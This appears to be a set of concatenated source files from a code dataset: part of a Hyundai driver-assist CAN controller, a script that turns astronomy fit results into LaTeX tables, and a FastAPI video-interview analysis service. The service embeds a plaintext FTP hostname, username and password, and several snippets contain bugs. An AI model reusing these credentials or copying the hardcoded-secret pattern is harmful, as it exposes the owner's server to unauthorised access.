self.apply_steer_last, CS.out.steeringTorque, param)\n self.steer_rate_limited = new_steer != apply_steer\n\n apply_steer_limit = param.STEER_MAX\n if self.steer_torque_ratio < 1:\n apply_steer_limit = int(self.steer_torque_ratio * param.STEER_MAX)\n apply_steer = self.limit_ctrl( apply_steer, apply_steer_limit, 0 )\n\n\n # disable if steer angle reach 90 deg, otherwise mdps fault in some models\n lkas_active = enabled and abs(CS.out.steeringAngle) < 180. #and self.lkas_button\n\n # fix for Genesis hard fault at low speed\n #if CS.out.vEgo < 16.666667 and self.car_fingerprint == CAR.GENESIS:\n # lkas_active = 0\n\n if not lkas_active:\n apply_steer = 0\n\n steer_req = 1 if apply_steer else 0\n\n self.apply_steer_last = apply_steer\n\n sys_warning, sys_state = self.process_hud_alert( lkas_active, CC )\n\n clu11_speed = CS.clu11[\"CF_Clu_Vanz\"]\n enabled_speed = 38 if CS.is_set_speed_in_mph else 60\n if clu11_speed > enabled_speed or not lkas_active:\n enabled_speed = clu11_speed\n\n can_sends = []\n if frame == 0: # initialize counts from last received count signals\n self.lkas11_cnt = CS.lkas11[\"CF_Lkas_MsgCount\"] + 1\n self.lkas11_cnt %= 0x10\n\n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 0 ))\n if CS.mdps_bus or CS.scc_bus == 1: # send lkas11 bus 1 if mdps is on bus 1 \n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 1 ))\n if CS.mdps_bus: # send clu11 to mdps if it is not on bus 0\n can_sends.append(create_clu11(self.packer, frame, CS.mdps_bus, CS.clu11, Buttons.NONE, enabled_speed))\n\n #if pcm_cancel_cmd and self.longcontrol:\n # can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.CANCEL, clu11_speed))\n #else: # send mdps12 to LKAS to prevent LKAS error if no cancel cmd\n can_sends.append(create_mdps12(self.packer, frame, CS.mdps12))\n\n #str_log1 = 'CV={:5.1f}/{:5.3f} torg:{:5.0f}'.format( self.model_speed, self.model_sum, apply_steer )\n str_log1 = 'CV={:5.1f} torg:{:6.1f}'.format( self.model_speed, apply_steer )\n #str_log2 = 'limit={:.0f} tm={:.1f} '.format( apply_steer_limit, self.timer1.sampleTime() )\n str_log2 = ' limit={:6.1f}/tm={:3.1f} MAX={:5.1f} UP/DN={:3.1f}/{:3.1f} '.format( apply_steer_limit, self.timer1.sampleTime(), self.MAX, self.UP, self.DN )\n trace1.printf( '{} {}'.format( str_log1, str_log2 ) )\n \n run_speed_ctrl = self.param_OpkrAccelProfile and CS.acc_active and self.SC != None\n if not run_speed_ctrl:\n str_log2 = 'U={:.0f} LK={:.0f} dir={} steer={:5.0f} '.format( CS.Mdps_ToiUnavail, CS.lkas_button_on, self.steer_torque_ratio_dir, CS.out.steeringTorque )\n trace1.printf2( '{}'.format( str_log2 ) )\n\n if pcm_cancel_cmd and self.CP.longcontrolEnabled:\n can_sends.append(create_clu11(self.packer, frame, CS.clu11, Buttons.CANCEL))\n\n elif CS.out.cruiseState.standstill:\n # run only first time when the car stopped\n if self.last_lead_distance == 0 or not self.param_OpkrAutoResume:\n # get the lead distance from the Radar\n self.last_lead_distance = CS.lead_distance\n self.resume_cnt = 0\n # when lead car starts moving, create 6 RES msgs\n elif CS.lead_distance != self.last_lead_distance < CS.lead_distance > 4.8 and (frame - self.last_resume_frame) > 5:\n can_sends.append(create_clu11(self.packer, frame, CS.scc_bus, CS.clu11, Buttons.RES_ACCEL, clu11_speed))\n self.resume_cnt += 1\n # interval after 10 msgs\n if self.resume_cnt > 10:\n self.last_resume_frame = frame\n self.resume_cnt = 0\n self.clu11_cnt = 0\n # reset lead distnce after the car starts moving\n elif self.last_lead_distance != 0:\n self.last_lead_distance = 0\n elif run_speed_ctrl and self.SC != None:\n is_sc_run = self.SC.update( CS, sm, self )\n if is_sc_run:\n can_sends.append(create_clu11(self.packer, self.resume_cnt, CS.scc_bus, CS.clu11, self.SC.btn_type, self.SC.sc_clu_speed ))\n self.resume_cnt += 1\n else:\n self.resume_cnt = 0\n\n str1 = 'run={} cruise_set_mode={} kph={:.1f}/{:.1f} DO={:.0f}/{:.0f} '.format( is_sc_run, self.SC.cruise_set_mode, self.SC.cruise_set_speed_kph, CS.VSetDis, CS.driverOverride, CS.cruise_buttons)\n str2 = 'btn_type={:.0f} speed={:.1f} cnt={:.0f}'.format( self.SC.btn_type, self.SC.sc_clu_speed, self.resume_cnt )\n str_log = str1 + str2\n self.traceCC.add( str_log ) \n\n\n # 20 Hz LFA MFA message\n if frame % 5 == 0 and self.car_fingerprint in [CAR.PALISADE, CAR.SELTOS]:\n can_sends.append(create_lfa_mfa(self.packer, frame, enabled))\n\n # counter inc\n self.lkas11_cnt += 1\n return can_sends\n","sub_path":"selfdrive/car/hyundai/carcontroller.py","file_name":"carcontroller.py","file_ext":"py","file_size_in_byte":14093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"352356588","text":"import sys\nimport os, os.path\nimport math\nimport numpy\nimport cPickle as pickle\nfrom optparse import OptionParser\n_RICHDBLEXPNAMES= ['HWR_dens_rich_g.sav',\n 'HWR_dens_rich_gbright.sav',\n 'HWR_dens_rich_gfaint.sav',\n 'HWR_dens_rich_g_south.sav',\n 'HWR_dens_rich_g_north.sav',\n 'HWR_dens_rich_g_bmin45.sav',\n 'HWR_dens_rich_g_bmax45.sav']\n_RICHFLARENAMES= ['HWR_dens_rich_g_flare.sav',\n 'HWR_dens_rich_gbright_flare.sav',\n 'HWR_dens_rich_gfaint_flare.sav',\n 'HWR_dens_rich_gsouth_flare.sav',\n 'HWR_dens_rich_gnorth_flare.sav',\n 'HWR_dens_rich_gbmin45_flare.sav',\n 'HWR_dens_rich_gbmax45_flare.sav']\n_RICHTWODBLEXPNAMES= ['HWR_dens_rich_g_twodblexp.sav',\n 'HWR_dens_rich_gbright_twodblexp.sav',\n 'HWR_dens_rich_gfaint_twodblexp.sav',\n 'HWR_dens_rich_gsouth_twodblexp.sav',\n 'HWR_dens_rich_gnorth_twodblexp.sav',\n 'HWR_dens_rich_gbmin45_twodblexp.sav',\n 'HWR_dens_rich_gbmax45_twodblexp.sav']\n_POORDBLEXPNAMES= ['HWR_dens_poor_g.sav',\n 'HWR_dens_poor_gbright.sav',\n 'HWR_dens_poor_gfaint.sav',\n 'HWR_dens_poor_g_south.sav',\n 'HWR_dens_poor_g_north.sav',\n 'HWR_dens_poor_g_bmin45.sav',\n 'HWR_dens_poor_g_bmax45.sav']\n_POORFLARENAMES= ['HWR_dens_poor_g_flare.sav',\n 'HWR_dens_poor_gbright_flare.sav',\n 'HWR_dens_poor_gfaint_flare.sav',\n 'HWR_dens_poor_gsouth_flare.sav',\n 'HWR_dens_poor_gnorth_flare.sav',\n 'HWR_dens_poor_gbmin45_flare.sav',\n 'HWR_dens_poor_gbmax45_flare.sav']\n_POORTWODBLEXPNAMES= ['HWR_dens_poor_g_twodblexp.sav',\n 'HWR_dens_poor_gbright_twodblexp.sav',\n 'HWR_dens_poor_gfaint_twodblexp.sav',\n 'HWR_dens_poor_gsouth_twodblexp.sav',\n 'HWR_dens_poor_gnorth_twodblexp.sav',\n 'HWR_dens_poor_gbmin45_twodblexp.sav',\n 'HWR_dens_poor_gbmax45_twodblexp.sav']\n_RICHFEHNAMES= ['HWR_dens_richpoorest_g_twodblexp.sav',\n 'HWR_dens_richpoor_g_twodblexp.sav']\n_RICHAFENAMES= ['HWR_dens_apoorpoor_g_twodblexp.sav',\n 'HWR_dens_apoorrich_g_twodblexp.sav']\n_POORFEHNAMES= ['HWR_dens_poorpoor_g_twodblexp.sav',\n 'HWR_dens_poorrich_g_twodblexp.sav']\n_POORAFENAMES= ['HWR_dens_arichpoor_g_twodblexp.sav',\n 'HWR_dens_arichrich_g_twodblexp.sav']\ndef resultsTable(parser):\n (options,args)= parser.parse_args()\n cmdline= '%python resultsTable.py '+args[0]+' --table='+options.table\n if len(args) == 0:\n parser.print_help()\n return\n #Set up sections\n if options.table.lower() == 'richresults':\n #sections= [_RICHDBLEXPNAMES,_RICHFLARENAMES,_RICHTWODBLEXPNAMES,\n # _RICHFEHNAMES]\n #format= ['hz','hR','hz1','hR1','a2','hf','ac']\n sections= [_RICHDBLEXPNAMES,_RICHTWODBLEXPNAMES,\n _RICHFEHNAMES,_RICHAFENAMES]\n format= ['hz','hR','hz1','hR1','a2','ac']\n elif options.table.lower() == 'poorresults':\n #sections= [_POORDBLEXPNAMES,_POORFLARENAMES,_POORTWODBLEXPNAMES,\n # _POORFEHNAMES]\n #format= ['hz','hR','hz1','hR1','a2','hf','ac']\n sections= [_POORDBLEXPNAMES,_POORTWODBLEXPNAMES,\n _POORFEHNAMES,_POORAFENAMES]\n format= ['hz','hR','hz1','hR1','a2','ac']\n elif options.table.lower() == 'afe':\n sections= [_AFENAMES]\n format= ['hz','hR','hz1','hR1','a2'] #just list the two-dblexp parameters\n #Make table\n outfile= open(args[0],'w')\n for section in sections:\n for name in section:\n #Open savefile\n savefile= open(os.path.join('..','fits',name),'rb')\n params= pickle.load(savefile)\n samples= pickle.load(savefile)\n savefile.close()\n if 'twodblexp' in name.lower():\n paramnames= ['hz','hz1','hR','hR1','a2']\n elif 'flare' in name.lower():\n paramnames= ['hz','hf','hR']\n else:\n paramnames= ['hz','hR','ac']\n thisline= {}\n for ii in range(len(paramnames)):\n xs= numpy.array([s[ii] for s in samples])\n if paramnames[ii] == 'a2' or paramnames[ii] == 'ac':\n #thisline[paramnames[ii]]= numpy.mean(xs)\n thisline[paramnames[ii]]= params[ii]\n err= numpy.std(xs)\n thisline[paramnames[ii]+'_err']= err \n else:\n #thisline[paramnames[ii]]= numpy.exp(numpy.mean(xs))\n thisline[paramnames[ii]]= numpy.exp(params[ii])\n err_low= numpy.exp(numpy.mean(xs))-numpy.exp(numpy.mean(xs)-numpy.std(xs))\n err_high= -numpy.exp(numpy.mean(xs))+numpy.exp(numpy.mean(xs)+numpy.std(xs))\n if err_low/err_high > 1.4 or err_low/err_high < 0.6:\n thisline[paramnames[ii]+'_low']= err_low\n thisline[paramnames[ii]+'_high']= err_high\n thisline[paramnames[ii]+'_err']= 0.5*(err_low+err_high)\n else:\n thisline[paramnames[ii]+'_err']= 0.5*(err_low+err_high)\n if thisline[paramnames[ii]] > 4.5:\n #Also list lower limit\n xs= sorted(numpy.array([s[ii] for s in samples]))\n indx2= int(numpy.floor(0.01*len(samples)))\n thisline[paramnames[ii]+'_ll']= numpy.exp(xs[indx2])\n #Set up line\n if 'bmin' in name:\n printline= '$|b| > 45^\\circ$ '\n elif 'bmax' in name:\n printline= '$|b| < 45^\\circ$ '\n elif 'north' in name:\n printline= '$b > 0^\\circ$ '\n elif 'south' in name:\n printline= '$b < 0^\\circ$ ' \n elif 'faint' in name:\n printline= 'faint plates '\n elif 'bright' in name:\n printline= 'bright plates '\n elif 'apoorpoor' in name:\n printline= '0.00 $<$ [$\\\\alpha$/Fe] $<$ 0.15 '\n elif 'apoorrich' in name:\n printline= '0.15 $\\leq$ [$\\\\alpha$/Fe] $<$ 0.25 '\n elif 'arichpoor' in name:\n printline= '0.25 $\\leq$ [$\\\\alpha$/Fe] $<$ 0.35 '\n elif 'arichrich' in name:\n printline= '0.35 $\\leq$ [$\\\\alpha$/Fe] $<$ 0.5\\phantom{0} '\n elif 'poorpoor' in name:\n printline= '\\protect{[}Fe/H] $<$ -0.7 '\n elif 'poorrich' in name:\n printline= '\\protect{[}Fe/H] $>$ -0.7 '\n elif 'richpoorest' in name:\n printline= '-1.5 $<$ \\protect{[}Fe/H] $<$ -0.6\\\\tablenotemark{1} '\n elif 'richpoor' in name:\n printline= '-0.6 $<$ [Fe/H] $<$ -0.3\\\\tablenotemark{1} '\n elif 'richrich' in name:\n printline= '-0.3 $<$ \\protect{[}Fe/H] \\phantom{$<$ -0.25} '\n else:\n printline= 'all plates '\n for paramname in format:\n if not thisline.has_key(paramname):\n printline+= '& \\ldots & '\n continue\n if thisline[paramname] > 4.5 \\\n and thisline[paramname] < 6.:\n ll, valerr= True, True\n elif thisline[paramname] >= 6.:\n ll, valerr= True, False\n else:\n ll, valerr= False, True\n #hz, hz1 are in pc\n for key in thisline.keys():\n if 'hz' in key \\\n and (key == paramname \\\n or key == (paramname+'_err') \\\n or key == (paramname+'_low') \\\n or key == (paramname+'_high') \\\n or key == (paramname+'_ll')):\n thisline[key]*= 1000.\n #Prepare\n if math.log10(thisline[paramname+'_err']) >= 0.:\n value= '%.0f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.0f}_{-%.0f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.0f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -1.:\n value= '%.1f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.1f}_{-%.1f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.1f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -2.:\n value= '%.2f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.2f}_{-%.2f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.2f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -3.:\n value= '%.3f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.3f}_{-%.3f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.3f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -4.:\n value= '%.4f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.4f}_{-%.4f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.4f' % thisline[paramname+'_err']\n elif math.log10(thisline[paramname+'_err']) >= -5.:\n value= '%.5f' % thisline[paramname]\n if thisline.has_key(paramname+'_low'):\n err= '$^{+%.5f}_{-%.5f}$' % (thisline[paramname+'_low'],thisline[paramname+'_high'])\n else:\n err= '$\\pm$%.5f' % thisline[paramname+'_err']\n if ll and valerr:\n #Both error and lower limit\n lower_lim= '%.1f' % thisline[paramname+'_ll']\n printline+= '& $>$'+lower_lim+' ('+value+'&'+err+')'\n elif ll:\n #Just lower limit\n lower_lim= '%.0f' % thisline[paramname+'_ll']\n printline+= '& $>$'+lower_lim+' & '\n else:\n #Print value+err\n printline+= '& '+value+'&'+err\n if not section == sections[-1] or not name == section[-1]:\n printline+= '\\\\\\\\'\n #Write the line\n outfile.write(printline+'\\n')\n if not section == sections[-1]:\n outfile.write('\\\\\\\\\\n')\n outfile.write(cmdline+'\\n')\n outfile.close()\n\ndef get_options():\n usage = \"usage: %prog [options] \\n\\noutputfilename= name of the file that the table will be saved to\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"--table\",dest='table',default='richresults',\n help=\"Table to prepare ('richresults', 'poorresults','afe')\")\n return parser\n\nif __name__ == '__main__':\n resultsTable(get_options())\n","sub_path":"py/resultsTable.py","file_name":"resultsTable.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"329740229","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom Face_Information import *\nimport cv2\nimport copy\nfrom starlette.responses import JSONResponse\nimport uvicorn\nfrom ftplib import FTP\nimport json\nfrom collections import OrderedDict\n\nfrom fastapi import BackgroundTasks\n\n\nfrom typing import List\nfrom starlette.middleware.cors import CORSMiddleware\nfrom database import session\nfrom model import TestTable, Test\n\n\n#병렬처리\nimport multiprocessing as Process\nimport time\n\n# 사용가능한 CPU 개수 확인\nprint('가능한_CPU >> ', Process.cpu_count())\n\n\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\n#\n# FD_Net, Landmark_Net, Headpose_Net, Emotion_Net = Initialization()\n# pose_detector = pose_Detector()\n# Emotion_list = []\n\n\n\nasync def video_task(userkey, videoNo, videoaddress):\n FD_Net, Landmark_Net, Headpose_Net, Emotion_Net = Initialization()\n pose_detector = pose_Detector()\n vc = cv2.VideoCapture(videoaddress)\n FPS = cv2.CAP_PROP_FPS\n sound_confirm = soundcheck(videoaddress)\n\n Gaze_list = []\n Roll_list = []\n Emotion_list = []\n Left_Hand_list = []\n Left_Hand_count = 0\n Left_Hand_time_list = []\n Left_Hand_point_list = []\n Left_Hand_point_result = []\n Right_Hand_list = []\n Right_Hand_count = 0\n Right_Hand_time_list = []\n Right_Hand_point_list = []\n Right_Hand_point_result = []\n Left_shoulder_list = []\n Right_shoulder_list = []\n Center_shoulder_list = []\n Shoulder_slope_list = []\n shoulder_vertically_left_count = []\n shoulder_vertically_right_count = []\n\n bReady = True\n # print(\"1\")\n if vc.isOpened() == False:\n bReady = False\n # print(\"errorrrrrrrrrr\")\n\n while(bReady):\n # print(\"2\")\n ret, frame = vc.read()\n if ret:\n if (int(vc.get(1)) % 5 == 0):\n # print(\"3\")\n # print(\"frame\", frame)\n frame = cv2.flip(frame, 1)\n img = frame\n img_show = copy.deepcopy(img)\n\n list_Face = []\n Face_count_list = []\n\n # face detection\n Face_Detection(FD_Net, img, list_Face)\n Face_count_list.append(len(list_Face))\n # print(\"체크체크\", len(list_Face))\n if len(list_Face) > 0:\n # print(\"4\")\n # draw face ROI. list_ETRIFace 를 순회하며 모든 검출된 얼굴의 박스 그리기\n for ii in range(len(list_Face)):\n cv2.rectangle(img_show, (list_Face[ii].rt[0], list_Face[ii].rt[1])\n , (list_Face[ii].rt[2], list_Face[ii].rt[3]), (0, 255, 0), 2)\n\n Landmark_list = Landmark_Detection(Landmark_Net, img, list_Face, 0)\n\n # 이하 추가적인 인식은 첫번째 얼굴에 대해서만 수행.\n # nIndex에 원하는 얼굴을 선택 가능\n\n # draw landmark\n # cv2.circle(img_show, (list_Face[0].ptLE[0], list_Face[0].ptLE[1]), 1, (0,0,255), -1)\n # cv2.circle(img_show, (list_Face[0].ptRE[0], list_Face[0].ptRE[1]), 1, (0, 0, 255), -1)\n # cv2.circle(img_show, (list_Face[0].ptLM[0], list_Face[0].ptLM[1]), 1, (0, 0, 255), -1)\n # cv2.circle(img_show, (list_Face[0].ptRM[0], list_Face[0].ptRM[1]), 1, (0, 0, 255), -1)\n\n # pose estimation\n pose = HeadPose_Estimation(Headpose_Net, img, list_Face, 0)\n # print(\"Y:%.1f / P:%.1f / R:%.1f\" % (pose[0], pose[1], pose[2]))\n Roll_list.append(pose[2].item())\n\n # emotion classification\n Emotion_Classification(Emotion_Net, img, list_Face, 0)\n # emotion label\n sEmotionLabel = [\"surprise\", \"fear\", \"disgust\", \"happy\", \"sadness\", \"angry\", \"neutral\"]\n sEmotionResult = \"Emotion : %s\" % sEmotionLabel[list_Face[0].nEmotion]\n EmotionResult = list_Face[0].fEmotionScore\n\n Emotion_list.append(EmotionResult)\n\n # 시선\n gaze = Gaze_Regression(list_Face, 0)\n Gaze_list.append(pose_Detector.gaze_Detecor(gaze, img_show))\n\n # 동작 검출\n pose_detector.findPose(img_show)\n lmList_pose = pose_detector.findPosition(img_show)\n\n # 왼손 추적 22222222\n if lmList_pose != 0:\n if lmList_pose[15][1] < 640 and lmList_pose[15][2] < 480:\n Left_hand = (lmList_pose[15][1], lmList_pose[15][2])\n Left_Hand_list.append(1)\n Left_Hand_time_list.append(1)\n Left_Hand_point_list.append(Left_hand)\n else:\n if len(Left_Hand_list) > 3:\n Left_Hand_count += 1\n Left_Hand_point_result.append(Left_Hand_point_list)\n Left_Hand_list = []\n Left_Hand_point_list = []\n\n # 오른손 추적 22222222\n if lmList_pose[16][1] < 640 and lmList_pose[16][2] < 480:\n Right_hand = (lmList_pose[16][1], lmList_pose[16][2])\n Right_Hand_list.append(1)\n Right_Hand_time_list.append(1)\n Right_Hand_point_list.append(Right_hand)\n else:\n if len(Right_Hand_list) > 3:\n Right_Hand_count += 1\n Right_Hand_point_result.append(Right_Hand_point_list)\n Right_Hand_list = []\n Right_Hand_point_list = []\n\n # 어깨\n left_shoulder = (lmList_pose[11][1], lmList_pose[11][2])\n right_shoulder = (lmList_pose[12][1], lmList_pose[12][2])\n center_shoulder_left = int((lmList_pose[11][1] + lmList_pose[12][1]) / 2)\n center_shoulder_right = int((lmList_pose[11][2] + lmList_pose[12][2]) / 2)\n center_shoulder = (center_shoulder_left, center_shoulder_right)\n\n Left_shoulder_list.append(left_shoulder)\n Right_shoulder_list.append(right_shoulder)\n Center_shoulder_list.append(center_shoulder)\n # print('left_shoulder >> ', left_shoulder)\n # print('landmark >> ', Landmark_list)\n\n # 어깨 상하\n shoulder_vertically_left_count.append(shoulder_vertically_left(left_shoulder, Landmark_list))\n shoulder_vertically_right_count.append(shoulder_vertically_right(right_shoulder, Landmark_list))\n\n # 어깨 좌우\n shoulder_horizontality_count_value = shoulder_horizontality_count(center_shoulder_left,\n Landmark_list)\n\n # 어깨 기울기\n shoulder_slope_value = shoulder_slope(right_shoulder, left_shoulder)\n Shoulder_slope_list.append(shoulder_slope_value)\n else:\n break\n\n Face_count_no_one = len(Face_count_list) - Face_count_list.count(1)\n # print(Face_count_no_one)\n if Face_count_no_one * 5 >= (FPS * 7):\n # print(\"분석 ㄴㄴ\")\n Face_analy_result = False\n else:\n # print(\"분석 ok\")\n Face_analy_result = True\n\n Emotion_analysi = Emotion_analysis(Emotion_list)\n\n # print(\"놀람\", Emotion_analysi[0], \"%\")\n # print(\"공포\", Emotion_analysi[1], \"%\")\n # print(\"역겨움\", Emotion_analysi[2], \"%\")\n # print(\"행복\", Emotion_analysi[3], \"%\")\n # print(\"슬픔\", Emotion_analysi[4], \"%\")\n # print(\"화남\", Emotion_analysi[5], \"%\")\n # print(\"중립\", Emotion_analysi[6], \"%\")\n # print('합', Emotion_analysi[7])\n\n # 시선 분석 결과\n # print(len(Gaze_list))\n\n # 얼굴 각도 결과\n Roll_mean_value = Roll_mean(Roll_list)\n # print(Roll_mean_value)\n\n # 어깨 각도 결과\n Shoulder_slope_mean_value = Shoulder_slope_mean(Shoulder_slope_list)\n # print(Shoulder_slope_mean_value)\n\n # 어깨 움직임 결과\n # print(\"왼쪽어\", (Left_shoulder_list))\n Left_shoulder_max_y_value = Left_shoulder_max_y(Left_shoulder_list)\n # print(Left_shoulder_max_y_value)\n\n Left_shoulder_min_y_value = Left_shoulder_min_y(Left_shoulder_list)\n # print(Left_shoulder_min_y_value)\n\n # print(\"오른쪽어\", Right_shoulder_list)\n Right_shoulder_max_y_value = Right_shoulder_max_y(Right_shoulder_list)\n # print(Right_shoulder_max_y_value)\n\n Right_shoulder_min_y_value = Right_shoulder_min_y(Right_shoulder_list)\n # print(Right_shoulder_min_y_value)\n\n # print(\"가운데어\", Center_shoulder_list)\n Center_shoulder_max_x_value = Center_shoulder_max_x(Center_shoulder_list)\n # print(Center_shoulder_max_x_value)\n\n Center_shoulder_min_x_value = Center_shoulder_min_x(Center_shoulder_list)\n # print(Center_shoulder_min_x_value)\n\n # 손\n Left_Hand_time = Left_Hand_time_calculation(Left_Hand_time_list)\n Right_Hand_time = Right_Hand_time_calculation(Right_Hand_time_list)\n\n result_data = OrderedDict()\n\n result_data[\"userkey\"] = userkey\n result_data[\"videoNo\"] = videoNo\n result_data[\"result\"] = {\"face_check\": Face_analy_result, \"sound_check\": 'sound_confirm',\n \"emotion_surprise\": Emotion_analysi[0], \"emotion_fear\": Emotion_analysi[1],\n \"emotion_aversion\": Emotion_analysi[2], \"emotion_happy\": Emotion_analysi[3],\n \"emotion_sadness\": Emotion_analysi[4],\n \"emotion_angry\": Emotion_analysi[5], \"emotion_neutral\": Emotion_analysi[6],\n \"gaze\": Gaze_list, \"face_angle\": Roll_mean_value,\n \"shoulder_angle\": Shoulder_slope_mean_value,\n \"left_shoulder\": {\"high_spot\": Left_shoulder_max_y_value,\n \"low_spot\": Left_shoulder_min_y_value,\n \"move_count\": shoulder_vertically_left_count}, # 왼쪽 위아래\n \"right_shoulder\": {\"high_spot\": Right_shoulder_max_y_value,\n \"low_spot\": Right_shoulder_min_y_value,\n \"move_count\": shoulder_vertically_right_count}, # 오른쪽 위아래\n \"center_shoulder\": {\"left_spot\": Center_shoulder_max_x_value, # 가로 움직임\n \"right_spot\": Center_shoulder_min_x_value,\n \"left_move_count\": shoulder_horizontality_count_value[0],\n \"right_move_count\": shoulder_horizontality_count_value[1]},\n \"left_hand\": {\"time\": Left_Hand_time, \"count\": Left_Hand_count,\n \"point\": Left_Hand_point_result},\n \"right_hand\": {\"time\": Right_Hand_time, \"count\": Right_Hand_count,\n \"point\": Right_Hand_point_result}}\n\n # with open('/home/ubuntu/projects/withmind_video/im_video/%d_%d_result.json' % (int(userkey), int(videoNo)), 'w', encoding='utf-8') as make_file:\n # json.dump(result_data, make_file, ensure_ascii=False, indent=\"\\t\")\n\n Gaze_velue = Average.Gaze_Avg(Gaze_list)\n Roll_velue = Roll_mean_value\n Shoulder_velue = Shoulder_slope_mean_value\n shoulder_left_count = shoulder_vertically_left_count\n shoulder_right_count = shoulder_vertically_right_count\n vertically_value = Average.vertically_Avg(Left_shoulder_max_y_value,\n Left_shoulder_min_y_value,\n Right_shoulder_max_y_value,\n Right_shoulder_min_y_value)\n horizontally_value = Average.horizontally_Avg(Center_shoulder_max_x_value, Center_shoulder_min_x_value)\n GestureTIME_value = Average.GestureTIME(Left_Hand_time, Right_Hand_time)\n\n # CSV 저장\n Average.Average_csv(Gaze_velue, Roll_velue, Shoulder_velue, shoulder_left_count, shoulder_right_count,\n vertically_value, horizontally_value, GestureTIME_value)\n\n print('Gaze >> ', Gaze_velue, 'Roll >> ', Roll_velue,\n 'Shoulder >> ', Shoulder_velue, 'shoulder_left_count >> ', shoulder_left_count, 'shoulder_right_count >> ',\n shoulder_right_count,\n 'vertically >> ', vertically_value, 'horizontally >> ', horizontally_value, 'GestureTIME >> ',\n GestureTIME_value)\n\n\n with open('C:/Users/withmind/Desktop/models/%d_%d_result.json' % (int(userkey), int(videoNo)), 'w', encoding='utf-8') as make_file:\n json.dump(result_data, make_file, ensure_ascii=False, indent=\"\\t\")\n\n ftp = FTP()\n\n ftp.connect('withmind.cache.smilecdn.com', 21)\n ftp.login('withmind', 'dnlemakdlsem1!')\n ftp.cwd('./analy_result')\n filename = '%d_%d_result.json' % (int(userkey), int(videoNo))\n # myfile = open('C:/Users/withmind/Documents/withmind/IM/01_python_pytorch_project/01_python_pytorch_project/video/im_video/' + filename, 'wb')\n # with open('C:/Users/withmind/Documents/withmind/IM/01_python_pytorch_project/01_python_pytorch_project/video/im_video/' + filename) as contents:\n # ftp.storbinary('STOR %s' % filename, contents)\n # fileroute = '/home/ubuntu/projects/withmind_video/im_video/'\n fileroute = 'C:/Users/withmind/Desktop/models/'\n myfile = open(fileroute + filename, 'rb')\n ftp.storbinary('STOR ' + filename, myfile)\n\n myfile.close()\n\n os.remove(fileroute + filename)\n\n test = TestTable()\n test.userkey = userkey\n test.videoNo = videoNo\n test.face_check = Face_analy_result\n test.sound_check = sound_confirm\n test.emotion_surprise = Emotion_analysi[0]\n test.emotion_fear = Emotion_analysi[1]\n test.emotion_aversion = Emotion_analysi[2]\n test.emotion_happy = Emotion_analysi[3]\n test.emotion_sadness = Emotion_analysi[4]\n test.emotion_angry = Emotion_analysi[5]\n test.emotion_neutral = Emotion_analysi[6]\n test.gaze = Gaze_list\n test.face_angle = Roll_mean\n test.shoulder_angle = Shoulder_slope_mean\n test.left_shoulder = {\"high_spot\": Left_shoulder_max_y_value, \"low_spot\": Left_shoulder_min_y_value,\n \"move_count\": shoulder_vertically_left_count}\n test.right_shoulder = {\"high_spot\": Right_shoulder_max_y_value, \"low_spot\": Right_shoulder_min_y_value,\n \"move_count\": shoulder_vertically_right_count}\n test.center_shoulder = {\"left_spot\": Center_shoulder_max_x_value,\n \"right_spot\": Center_shoulder_min_x_value,\n \"left_move_count\": shoulder_horizontality_count_value[0],\n \"right_move_count\": shoulder_horizontality_count_value[1]}\n test.left_hand = {\"time\": Left_Hand_time, \"count\": Left_Hand_count,\n \"point\": Left_Hand_point_result}\n test.right_hand = {\"time\": Right_Hand_time, \"count\": Right_Hand_count,\n \"point\": Right_Hand_point_result}\n\n\n\n\n session.add(test)\n session.commit()\n\n\nclass Item(BaseModel):\n userkey: int\n videoNo: int\n videoaddress: str\n\n@app.post(\"/\", status_code=202)\nasync def analy(item: Item, background_tasks: BackgroundTasks):\n userkey = item.userkey\n videoNo = item.videoNo\n videoaddress = item.videoaddress\n\n # vc = cv2.VideoCapture(videoaddress)\n #\n # test = True\n #\n # if vc.isOpened() == False:\n # result = False\n # return test\n #\n # # soundconfirm = soundcheck(videoaddress)\n # while(test):\n # ret, frame = vc.read()\n # print(\"1\")\n # if ret:\n # if(int(vc.get(1)) % 5 == 0):\n # frame = cv2.flip(frame, 1)\n # img = frame\n # img_show = copy.deepcopy(img)\n # list_Face = list()\n # # await Face_Detection(FD_Net, img, list_Face)\n #\n # # background_tasks.add_task(Face_Detection, FD_Net, Landmark_Net, Headpose_Net, Emotion_Net, img, list_Face)\n\n background_tasks.add_task(video_task, userkey, videoNo, videoaddress)\n\n # 